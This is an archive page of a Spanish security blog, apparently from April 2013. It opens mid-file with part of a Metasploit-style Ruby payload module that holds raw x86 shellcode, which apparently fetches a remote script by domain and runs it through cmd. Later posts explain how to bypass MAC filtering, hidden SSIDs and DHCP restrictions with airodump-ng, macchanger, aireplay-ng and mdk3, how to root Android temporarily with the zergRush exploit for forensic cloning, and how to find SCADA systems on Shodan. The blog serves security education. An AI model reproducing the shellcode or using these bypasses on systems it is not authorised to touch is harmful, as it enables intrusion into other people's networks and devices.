                                     \x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57
                                     \x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24
                                      \x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                    'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff
                                  \x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10
                                   \x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B
                                    \xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b
                                    \xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33
                                    \xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66
                                    \x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04
                                     \x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8
                                    \x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61
                                    \xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40
                                      \x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05
                                       \x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33
                                       \xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
                }
            ))
        # We use rtlExitThread(0)
        deregister_options('EXITFUNC')
        # Register the domain and cmd options
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
            ], self.class)
    end
    #
    # Constructs the payload
    #
    def generate_stage
        domain  = datastore['DOMAIN'] || ''
        extens  = datastore['FILE'] || 'vbs'
        # \"x66\x79\x66\x01"
        extLen=extens.length
        while extens.length<4 div="div">
            extens=extens+"\x01"
        end
        i=0
        while i
            extens[i,1]=(extens[i].ord+1).chr
            i=i+1
        end
        while domain.length<10 div="div">
            domain=domain+"\xFF"
        end
        domain="\x2e"+domain
        payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
        return payload
    end
end

17 abr 2013

Configuraciones básicas de "Seguridad" en redes Wireless (Parte I de II)

Existen configuraciones muy básicas de seguridad para los puntos de acceso. En muchos ámbitos, y un sector de los profesionales de la seguridad, no se consideran configuraciones de seguridad, pero si aportan una pequeña capa, la cual habría que evadir. Para muchos estas configuraciones no aportan seguridad, y realmente son sencillas de evadir, pero siendo objetivos son pequeñas capas que pueden ayudar al usuario de casa a protegerse. En este artículo se presentan y se indicará como saltar dichas protecciones. A continuación se enumeran:

  • Filtrado de direcciones MAC.
  • DHCP desactivado o con reparto erróneo de información.
  • SSID Oculto.

El filtrado de direcciones MAC permite autenticarse en la red sólo con un conjunto de direcciones MAC válido. Para saltar esta protección, sencillamente habrá que realizar MAC Spoofing, es decir, suplantar la dirección MAC de un cliente que tenga acceso a la red. A continuación se propone el algoritmo ha utilizar en este proceso:

  1. Airodump-ng y el adaptador en modo monitor se puede visualizar los clientes asociados a un punto de acceso.
  2. Si no hay un cliente asociado al punto de acceso, se deberá esperar a que esta situación se concrete.
  3. Una vez se dispone de una dirección MAC válida, se debe cambiar mediante el uso de la herramienta macchanger.
  4. Se ha conseguido realizar un bypass del filtrado de direcciones MAC en un punto de acceso.

La restricción DHCP puede entenderse de varias maneras. La primera es que el servidor DHCP de la red wireless a la que se accede no aporta direcciones IP de manera dinámica.  ¿Con qué fin? Confundir al intruso y no conseguir conectividad con máquinas de la WLAN, ni salida a Internet. Si el servidor DHCP se encuentra deshabilitado saltarse la restricción es tan sencillo como configurar la dirección IP, DNS y puerta de enlace manualmente. ¿Cómo sabemos el rango de la red? Si existe un cliente asociado a la red se coloca un sniffer, o incluso con airodump-ng, y se captura el tráfico de la red obteniendo la dirección IP del cliente asociado. Si no existe un cliente asociado a la red, se podría hacer un escaneo ARP a rangos de red locales para ver al router y encontrar el posible rango. Otra posibilidad es esperar a que los paquetes multicast aparezcan, que seguro que ocurre, y obtener una dirección IP válida.

Si el servidor DHCP reparte direcciones IP falsas, es decir, de un rango erróneo al de la red, el usuario notará que no encuentra equipos en ese segmento ni puede navegar a través de Internet. Se podría utilizar el procedimiento descrito para cuando el servidor DHCP se encuentra deshabilitado, y de esta forma obtener el rango correcto.

La restricción del SSID consiste en ocultar el nombre de la red, lo cual provoca que un cliente deba introducir el nombre de la red inalámbrica a la que se quiere conectar. Existen varias posibilidades para obtener el SSID de la red, si existe un cliente asociado a la red wireless, se puede provocar mediante aireplay-ng la desautenticación del punto de acceso y conseguir que el cliente se vuelva a autenticar enviando un paquete Probe con el nombre de la red. Si no existe ningún cliente asociado al punto de acceso se deberá esperar a que se autentique un cliente, o bien, realizar fuerza bruta con la aplicación mdk3. Para nombres de red menores de 5 o 6 caracteres la fuerza bruta puede ser una solución, para nombres de mayor longitud no es una buena opción.

16 abr 2013

Dame mi pasta, a por los Bitcoins

Con este título es posible que te haya venido a la cabeza la imagen de la tan simpática serie:

 

El Bitcoin cada vez se hace mas presente en la ciudad y mucha gente empieza a minar Bitcoins con sus equipos. Al menos para poder ir obteniendo algunos bitcoins y poder comprar alguna cosa.

Han abierto multitud de sitios en los que dan información sobre Bitcoins, además de que te permiten tener tu Wallet con tus Bitcoins de lo que vas minando.

Han habido varios incidentes relacionados con los Bitcoins.

bitcoins

Tanto es así que incluso páginas webs que ofrecían servicios relacionados con los Bitcoins, han desaparecido después de algún incidente.

No sería raro si os digo que las mafias ya se están focalizando en atacar este sector de los Bitcoins

¿Como?

Pues robando el Wallet de cada equipo. Podrían comprometer la máquina donde se están minando los Bitcoins y robar la cartera con todos los bitcoins. Esto ha ocurrido y de echo ya existe malware que puede llegar ha hacer dos cosas.

1-Utilizar tu equipo para minar Bitcoins:

O bien robarte el Wallet y quedarte sin ninguno de tus Bitcoins!

Ten cuidado!

15 abr 2013

Herramientas forense para ser un buen CSI. Parte XX: Clonación en Android II de III

Buenas a todos, continuando donde terminamos el pasado lunes, ya hemos instalado el SDK de Android en nuestro PC y nos hemos conectado a través de ADB a nuestro terminal, por lo que ya estamos disponibles para realizar la clonación.En este punto se nos pueden dar dos situaciones, que el terminal esté rooteado, por lo que no tendríamos ningún problema para realizar la adquisición de evidencias, o que no se encuentre rooteado, para lo cual deberemos realizar un rooteo en el terminal (al menos temporal, no hace falta tirar de recovery para realizar un rooteo permanente).Si no rooteasemos el móvil, al intentar clonar con DD una partición nos encontraríamos con el siguiente mensaje:

Nos deniega la operación. Además, si nos fijamos en la parte izquierda tenemos el símbolo dólar (para ser root tiene que figurar una #). Así que vamos a rootear el móvil temporalmente. Para ello yo haré uso de la herramienta SuperOneClick, que me recomendó mi amigo Luis Delgado hace algún tiempo :)

Lo primero que debéis hacer es descargar la aplicación desde el siguiente link: http://shortfuse.org/?page_id=2Esta herramienta la he probado con el exploit zergRush en un Wildfire con Android 2.1 y en un Desire con 2.3.3 y me han funcionado sin problemas. Tenéis muchas herramientas para conseguir elevar privilegios a Root además de SuperOneClick (solo hay que googlear un poco).Una vez descargada, debéis ejecutarla como usuario administrador (importante).Ahora debéis elegir la configuración para el rooteo (en mi caso Exploit ZergRush y botón "Shell Root"):

Un consejo que os doy es que para un pericial seleccionéis la opción "Shell Root", ya que si seleccionáis "Root", os va a reiniciar el terminal, y es muy posible que no sepáis el código PIN ;)Una vez terminado el proceso, dura un minuto aproximadamente, ya podremos conectarnos de nuevo a través de ADB al móvil, y si todo ha ido correctamente veremos una bonita almohadilla :-)

En el próximo post utilizaremos nuestros recien conseguidos permisos de Root para clonar las particiones del terminal.

Saludos!

14 abr 2013

Informe Flu - 119

Una semana más os traemos el resumen de la semana en Flu Project:Lunes 8 de AbrilMartes 9 de AbrilMiércoles 10 de Abril
  • El miércoles hablamos de Hexinject, una herramienta que no puede faltar en vuestro arsenal.
Jueves 11 de Abril

Viernes 12 de Abril

Sábado 13 de Abril

13 abr 2013

Recopilatorio de Mundo Hacker en Discovery Max

Buenas a todos, como sabéis desde hace un mes se está emitiendo una nueva temporada de la serie Mundo Hacker en la cadena de TDT Discovery MAX. Por el momento se han publicado ya los primeros 4 episodios y en los que han salido numerosos profesionales y amigos del sector de la seguridad.Gracias a pvzzle tenemos los capítulos disponibles en Youtube para verlos en cualquier momento. Os los listamos a continuación (también podéis verlos desde la web de Discovery MAX a partir del lunes siguiente a la emisión de cada episodio):

Mundo Hacker en Discovery MAX - SPAM Y PHISING - Capítulo 1 (15 - 3 - 2013)

[youtube Eefzjwx1ee0 nolink]

Mundo Hacker en Discovery MAX - SEGURIDAD EN REDES WIFI - Capítulo 2 (22 - 3 - 2013)

[youtube P-XyKvYZNek nolink]

Mundo Hacker en Discovery MAX - CIBERGUERRA - Capítulo 3 (05 - 4 - 2013)

[youtube 7p0j70k1xFk nolink]

Mundo Hacker en Discovery MAX - SEGURIDAD EN DISPOSITIVOS MÓVILES - Capítulo 4 (12 - 4 - 2013)

[youtube urcp0FtMaEg nolink]

En Mundo Hacker veréis hacer numerosas pruebas de concepto en entornos reales, pero eso no quita que se puedan realizar todas sin infringir alguna que otra ley, recordad que es una serie de televisión, y este tipo de temas los tienen ya previamente controlados antes de emitir los capítulos, así que tened cuidado con reproducir todas las POC en la vida real fuera de un entorno controlado, no os tengan que hacer una visita los amigos de verde...

Saludos!

12 abr 2013

Shodan ¿Aún no lo conoces?

Mientras leía las noticias me encontré con una que me pareció de lo mas curiosa.La noticia contenía el siguiente titular:

Shodan, called ‘the scariest search engine on the internet’, finds traffic lights, power plants

[youtube Pyi1mwowPUo nolink]

La noticia no salía reflejada en un blog técnico. La noticia se había redactado en una página web de noticias. Esto me agradó porque parece que fuera del sector de la seguridad se empiezan a hacer eco de algunas de las cosas que existen y del peligro que pueden llegar a tener si se usa con fines maliciosos.Podemos hacer búsquedas de todo tipo en Shodan:

shodan

En este caso podríamos llegar a encontrar paneles de administración relacionados con el agua. Cada uno que saque sus propias conclusiones.En el caso de que un atacante quisiera buscar sistemas operativos con bugs conocidos podrían hacer la búsqueda.

shodan_2

 Si queremos ir un poco mas alla, podemos buscar por aquellos sistemas llamados SCADA

shodan_3

Como veis Shodan permite realizar este tipo de búsquedas de manera muy sencilla, sin apenas esfuerzo para encontrar aquello que estamos buscando.